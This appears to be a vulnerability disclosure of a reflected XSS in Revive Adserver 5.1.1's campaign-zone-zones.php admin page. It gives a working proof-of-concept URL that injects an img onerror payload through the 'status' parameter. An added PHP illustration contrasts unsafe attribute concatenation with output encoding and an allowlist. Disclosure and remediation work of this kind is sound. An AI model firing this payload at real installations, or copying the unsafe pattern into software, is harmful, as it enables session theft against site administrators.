I found a reflected XSS attack on /admin/campaign-zone-zones.php.
Revive-Adserver version is revive-adserver-5.1.1.
Go to http://revive-adserver.loc/admin/campaign-zone-zones.php?_=&clientid=1&campaignid=1&status=available%22%3E%3Cimg%20src=1%20onerror=alert(document.domain)%3E&text=
Malicious code executed
{F1187355}
Rendered response from server:
{F1187356}
With this vulnerability, an attacker can, for example, steal users' cookies or redirect users to a malicious website.
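The `">` at the start of the payload indicates that `status` is reflected inside a double-quoted HTML attribute without encoding. The following is an added illustration of that pattern next to a hardened form; it is not part of the original report and not Revive Adserver source code. The function names, the markup and the allowlist entry `linked` are hypothetical; only the parameter name `status`, the value `available` and the payload come from the URL above.

```php
<?php
// Added illustration; not Revive Adserver code. Names and markup are hypothetical.

// Pattern consistent with the reported behaviour: the raw query parameter is
// concatenated into a double-quoted attribute, so a `"` ends the attribute
// and `>` ends the tag.
function renderStatusUnsafe(string $status): string
{
    return '<input type="hidden" name="status" value="' . $status . '">';
}

// Context-aware output encoding: ENT_QUOTES encodes both quote styles, so the
// value cannot leave the attribute it is written into.
function encodeAttr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened form: validate against an allowlist first, then encode on output.
function renderStatusSafe(string $status): string
{
    // Assumed set of valid values. 'available' appears in the report;
    // 'linked' is a hypothetical second value for illustration.
    $allowed = ['available', 'linked'];
    if (!in_array($status, $allowed, true)) {
        $status = 'available'; // fall back to a known-good default
    }
    return '<input type="hidden" name="status" value="' . encodeAttr($status) . '">';
}

// Value of `status` from the report's URL after URL-decoding.
$payload = 'available"><img src=1 onerror=alert(document.domain)>';

// Unsafe: the output contains a live <img> element with an onerror handler.
echo renderStatusUnsafe($payload), PHP_EOL;

// Encoding only: the payload stays inside the attribute as inert text.
echo '<input type="hidden" name="status" value="' . encodeAttr($payload) . '">', PHP_EOL;

// Allowlist plus encoding: the unexpected value is replaced entirely.
echo renderStatusSafe($payload), PHP_EOL;
```

Setting the `HttpOnly` flag on session cookies limits the cookie-theft impact described above, but does not stop the injected script from running.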